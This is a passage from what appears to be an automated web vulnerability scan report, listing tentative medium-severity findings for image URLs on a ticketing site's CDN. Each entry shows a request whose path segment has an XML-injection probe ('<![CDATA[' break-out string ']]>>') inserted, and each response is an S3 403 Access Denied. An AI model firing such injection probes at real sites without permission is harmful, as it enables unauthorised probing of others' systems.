x-amz-id-2: N+PBn1iCyWbTq1F3bRHgZEc77k12U4pcO9zm1qa1q2d5SjxHqNAi4tPbUjP4iQbJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 66d7c7c992b705418d8d031c0d69e3139324fce1824f98c93ca338a81a6c8c2e56f783785a5c4d1e
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>68D659726C9F9AA2</RequestId><HostId>N+PBn1iCyWbTq1F3bRHgZEc77k12U4pcO9zm1qa1q2d5SjxHqN
...[SNIP]...

8.57. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 29CE6CA3361C9A42
x-amz-id-2: S7ZfhvdOl+jpEdGVXr9u4p+7sxO/m6/lFMFCjan2kMtJNPJOkEuh6x1bvYFOIBz5
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b1dc8b579c61f3ef634a769fc10c210d69b21f11ad08e1f3ae30f606049d93dfa5d2dd8f50270a2c
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>29CE6CA3361C9A42</RequestId><HostId>S7ZfhvdOl+jpEdGVXr9u4p+7sxO/m6/lFMFCjan2kMtJNPJOkE
...[SNIP]...

8.58. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EE4786D2F0C4DD41
x-amz-id-2: fWaPkQ+hakyyzDbF3USV79rrF672ZyTjZ04gQuNsO6iNoLuBtpGzH18Mz0bzhxak
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0835c814b3fd9c932d918eb0a1ba6f085ce05356aa50fbb2bacceccdcf7381dc01010303caae3d01
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE4786D2F0C4DD41</RequestId><HostId>fWaPkQ+hakyyzDbF3USV79rrF672ZyTjZ04gQuNsO6iNoLuBtp
...[SNIP]...

8.59. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-135.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1FB3F482E6730F8D
x-amz-id-2: oL7r+oxwkWPHTeXRL9mWTefzjmVfz2ySxJdqpVXzeuzHtbdU5GX3qNtLfx5WfcNa
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3a00e9dc64c346facd0277006decc8814bcf705e9e66391bb1271299ab13c0a46a76c6bc40f0aa28
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1FB3F482E6730F8D</RequestId><HostId>oL7r+oxwkWPHTeXRL9mWTefzjmVfz2ySxJdqpVXzeuzHtbdU5G
...[SNIP]...

8.60. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-135.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C9955B308F8FEFFE
x-amz-id-2: kwLZ1rz9YYbpnWjTTmLZY7WNyG+Vf+VTSZgMVSURLy813qhkSA2aJB3Jd697ZdXC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6d6eddabf17889e85299959e8b897592ee84960d9a81f7aed6d5a272b8ab5ed934392d2408d2737d
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C9955B308F8FEFFE</RequestId><HostId>kwLZ1rz9YYbpnWjTTmLZY7WNyG+Vf+VTSZgMVSURLy813qhkSA
...[SNIP]...

8.61. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8C45CD6008731035
x-amz-id-2: kCrb7KiNecQtqv7ZTIpufFUd8ANe7rUjIdkm81J8VLoJfLpoVegk/QHR3pcst3SN
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 57df09e29366269f360f1ad6f23b3935f51af117099809cc7d200aaecbb8182bde14a557042ff01b
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8C45CD6008731035</RequestId><HostId>kCrb7KiNecQtqv7ZTIpufFUd8ANe7rUjIdkm81J8VLoJfLpoVe
...[SNIP]...

8.62. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1894ACE74A3AB241
x-amz-id-2: rVaqUWzjfyUkbvNeUbMu925QyydHPq0lxP9pgelyKWA5g9MUre2Nav5TPFkzGfMn
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 69931ef36690f51112bf426d8608f98b766e14f6a9c76959319749f0c4065817914f28261c056e9c
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1894ACE74A3AB241</RequestId><HostId>rVaqUWzjfyUkbvNeUbMu925QyydHPq0lxP9pgelyKWA5g9MUre
...[SNIP]...

8.63. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6A147218662C06A9
x-amz-id-2: K9pLp0vq2f82T+iYSFXV6Cuu6Hz/1efT7ERnne/qIBbNS7BlZA9xBUVqwPA9IutP
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 586f006cc67fd9fa5afe77486f7868cf2bff0c8300beac35321828fc04fe232ec55a13543f8eb349
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6A147218662C06A9</RequestId><HostId>K9pLp0vq2f82T+iYSFXV6Cuu6Hz/1efT7ERnne/qIBbNS7BlZA
...[SNIP]...

8.64. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-511.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 164E4104D16CF0FA
x-amz-id-2: pWpy1OveVsYhNN/xyKV63zweyNPCWVZLChPOyb4Z9YZKW82wroMsgRm2rAZMTy6J
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d6254a0dc9ae262649a1c0325c60dacc78a7ea9135c3b5e4ad891a608505abed200e42141ab0cb55
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>164E4104D16CF0FA</RequestId><HostId>pWpy1OveVsYhNN/xyKV63zweyNPCWVZLChPOyb4Z9YZKW82wro
...[SNIP]...

8.65. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AAF1730954521EE0
x-amz-id-2: 4QQ+96oTmpoWYSqiJL4Fbm1ZyQZdYtav/gZC+ofShTcRwDhgEDy4KrRN2UXwyVUj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7f984e68affe60ea88b984bb5251119734e18f272a0b53d83ad7ffc5cea473b1500cb1edeaa228ba
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AAF1730954521EE0</RequestId><HostId>4QQ+96oTmpoWYSqiJL4Fbm1ZyQZdYtav/gZC+ofShTcRwDhgED
...[SNIP]...

8.66. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 102A6EC9CAC96E3B
x-amz-id-2: HmucvidHyY5ushXsS4NiRudCuTKdffLZrK7yr6qS4d+iHGXXiJ+HTS5reBHB9ijP
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d03541a0b8b26853ac2245702397cc42fe58f78f77042091ce8d2e1e585b997a7ac952627c833753
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>102A6EC9CAC96E3B</RequestId><HostId>HmucvidHyY5ushXsS4NiRudCuTKdffLZrK7yr6qS4d+iHGXXiJ
...[SNIP]...

8.67. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 010973A1895BEAF2
x-amz-id-2: HpuosBrBtWSSXrPDtxfu2+54bzf26LAze+FbckOPNQvB5zReamkOtlFureZrm0G0
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4c48a7fac10bcbc5c766813da4652fe5625aa1f5b1ab0bddfef7f77072e475e86fc2cb72bf54e9ef
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>010973A1895BEAF2</RequestId><HostId>HpuosBrBtWSSXrPDtxfu2+54bzf26LAze+FbckOPNQvB5zReam
...[SNIP]...

8.68. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-522.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A4F6E3B38035BCCE
x-amz-id-2: AGtnLFN3nwFcFN70x2tK0VNzfpzd0jwKmB9XCYHD6ImEvGBh+iSoMDHT0TvPePgw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 27c7bbe3b92278238b6ac74a01899a7d6acb45bb2b4f85a8e5fd1ba8fb583f54f3dc3dac34273d41
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A4F6E3B38035BCCE</RequestId><HostId>AGtnLFN3nwFcFN70x2tK0VNzfpzd0jwKmB9XCYHD6ImEvGBh+i
...[SNIP]...

8.69. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0F2336139DD00BAE
x-amz-id-2: H0z/uZxdfL/VZyRXbSUTsInE5zPXQYTpMj8+ZtsTLJGJBVYoZRIGzrjHS0tf4XqD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:47 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 83f86af8884bc81fc5641826c9968a004cbb4794518bcc78f5f6aa586fc25310dc32d65d8011ee6f
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0F2336139DD00BAE</RequestId><HostId>H0z/uZxdfL/VZyRXbSUTsInE5zPXQYTpMj8+ZtsTLJGJBVYoZR
...[SNIP]...

8.70. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D6400300F2AD43B5
x-amz-id-2: O+AQMbgBn9swZHUsU7N+sX2VNfp3kCvBuHBPhqEhdX+3RvyKFxzJM3ZpBh4SXgyi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5f22d6b79c37eb5e835226fc9bd38587e49df52ae488cbf64d699a7cd2755d9f28700d4f2adf05c1
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D6400300F2AD43B5</RequestId><HostId>O+AQMbgBn9swZHUsU7N+sX2VNfp3kCvBuHBPhqEhdX+3RvyKFx
...[SNIP]...

8.71. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

